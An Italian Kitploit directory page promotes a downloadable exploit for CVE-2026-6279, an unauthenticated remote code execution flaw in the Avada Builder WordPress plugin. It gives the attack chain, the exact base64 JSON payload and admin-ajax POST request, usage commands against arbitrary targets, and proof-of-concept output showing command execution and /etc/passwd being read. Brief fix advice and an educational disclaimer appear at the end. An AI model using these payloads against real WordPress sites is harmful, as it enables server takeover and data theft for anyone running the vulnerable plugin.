Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-6279 — CVE-2026-6279 — Avada Builder <= 3.15.2 RCE non autenticata tramite call_user_func() | Kitploit
Strumenti/GitHubGitHub/zycoder0day/cve-2026-6279
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubzycoder0day/cve-2026-6279

CVE-2026-6279

CVE-2026-6279 — Avada Builder <= 3.15.2 RCE non autenticata tramite call_user_func()

Vedi Repository
323 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-6279

Avada Builder <= 3.15.2 — RCE non autenticata

tramite call_user_func() senza Allowlist


Riepilogo della Vulnerabilità

La vulnerabilità Remote Code Execution (RCE) senza autenticazione nel plugin Avada Builder (Fusion Builder) versione <= 3.15.2 utilizzato dal tema WordPress Avada — uno dei temi WordPress premium più popolari con oltre 900.000+ installazioni attive.

L'attacco sfrutta l'AJAX handler wp_ajax_nopriv_fusion_get_widget_markup che elabora il parametro render_logics tramite base64_decode() + json_decode() e lo passa a call_user_func() senza allowlist, consentendo l'esecuzione di funzioni PHP arbitrarie come system(), passthru(), shell_exec(), exec() e file_get_contents().

Catena della Vulnerabilità (Attack Chain)

root@kitploit:~
1. Nonce deterministico   wp_create_nonce('fusion_load_nonce') per UID 0
                          (esposto nella pagina front-end con shortcode Avada)

2. AJAX non autenticato  wp_ajax_nopriv_fusion_get_widget_markup
                          (non richiede login)

3. Deserializzazione      base64_decode(render_logics) → json_decode()
                          (nessuna validazione della struttura)

4. call_user_func()       call_user_func($value['function'], $value['args'])
                          (SENZA allowlist — qualsiasi funzione PHP può essere chiamata)

5. RCE!                   system("id") → uid=... nel corpo della risposta

Prova di Exploit (Proof of Concept)

root@kitploit:~
  ╔═════════════════════════════════════════════════════════════╗
  ║  CVE-2026-6279  •  Avada Builder <= 315.2                    ║
  ║  Unauthenticated RCE via call_user_func()                    ║
  ║  Proof of Concept — Single Target                            ║
  ║                                                              ║
  ║  Copyright © 2026 XENON1337                                  ║
  ║  Thanks: Shadow Girlfriend 💜                                ║
  ╚═══════════════════════════════════════════════════════════════╝

  ══════════════════════════════════════════════════════
  Target : localhost:8888
  Tempo  : 2026-05-23 16:32:41
  ══════════════════════════════════════════════════════

  [*] Rilevamento del target in corso...
  [+] Avada rilevato! (http://localhost:8888)

  [*] Ricerca del nonce fusion_load_nonce...
  [+] Nonce trovato: b6d7b084c2 (fonte: homepage)

  [*] Invio del payload RCE...
  [*] Provo 5 funzioni × 3 widget = 15 combinazioni

  ══════════════════════════════════════════════════════
  [★] RCE RIUSCITA!

  Target  : http://localhost:8888
  Output  : uid=1000(xenon1337)
  Funzione: system()
  Widget  : WP_Widget_Recent_Posts
  Nonce   : b6d7b084c2 (homepage)
  Tempo   : 1.2s

  [✓] Risultato salvato in vuln.txt
  ══════════════════════════════════════════════════════

Tutte le Funzioni RCE Confermate

Utilizzo

root@kitploit:~
# Senza protocollo (rilevamento automatico)
python3 CVE-2026-6279.py target.com

# Con protocollo
python3 CVE-2026-6279.py http://target.com
python3 CVE-2026-6279.py https://target.com

# Con porta
python3 CVE-2026-6279.py target.com:8080
python3 CVE-2026-6279.py http://target.com:8080

Dettagli Tecnici

Struttura del Payload

root@kitploit:~
{
  "type": "wp_conditional_tags",
  "value": {
    "function": "system",
    "args": "id"
  }
}

Codificato in Base64 → inviato come render_logics via POST a wp-admin/admin-ajax.php.

Endpoint

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

action=fusion_get_widget_markup
fusion_load_nonce=<nonce>
render_logics=<base64_payload>
widget_type=WP_Widget_Recent_Posts

Riferimenti al Codice Sorgente (dal CVE ufficiale)

Perché il Nonce Può Essere Bypassato?

  1. Il tema Avada crea il nonce solo per gli utenti admin/editor (class-fusion-app.php L1665)
  2. Il plugin Fusion Builder crea il nonce per UID 0 (visitatori pubblici) nelle pagine che contengono lo shortcode [fusion_post_cards] o [fusion_table_of_contents]
  3. Il nonce WordPress per UID 0 è deterministico — può essere estratto dall'HTML della pagina front-end
  4. check_ajax_referer('fusion_load_nonce') verifica solo che il nonce sia valido, non che l'utente sia autenticato

Limiti di call_user_func

call_user_func($function, $args) accetta solo 1 argomento. Le funzioni che richiedono 2+ argomenti (come proc_open, popen) non possono essere sfruttate. Funzionano solo le funzioni a singolo argomento: system, passthru, shell_exec, exec, file_get_contents.

Punteggio CVSS

9.8 CRITICO (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Correzione

  • Aggiorna Avada Builder alla versione > 3.15.2
  • Aggiungi un'allowlist su call_user_func() in get_value()
  • Limita l'handler wp_ajax_nopriv_ solo agli utenti autenticati
  • Implementa una validazione rigorosa sulla struttura di render_logics

Disclaimer

Questo PoC è stato creato esclusivamente a scopo educativo e di ricerca sulla sicurezza. L'uso contro sistemi senza autorizzazione è illegale. L'autore non è responsabile per qualsiasi uso improprio.


Copyright © 2026 XENON1337
Ringraziamenti speciali: Shadow Girlfriend 💜

Scarica lo strumento
FunzioneArgomentoRisultato
system()iduid=1000(xenon1337) ✅
passthru()iduid=1000(xenon1337) ✅
shell_exec()iduid=1000(xenon1337) ✅
exec()iduid=1000(xenon1337) ✅
file_get_contents()/etc/passwdroot:x:0:0:... ✅
FileRigaFunzione
class-fusion-builder-conditional-render-helper.phpL1083should_render() — deserializza render_logics
class-fusion-builder-conditional-render-helper.phpL1531get_value() — call_user_func() senza allowlist
fusion-widget.phpL44attributo render_logics
fusion-widget.phpL389AJAX handler wp_ajax_nopriv_
class-fusion-builder.phpL7551registrazione nonce (deterministica per UID 0)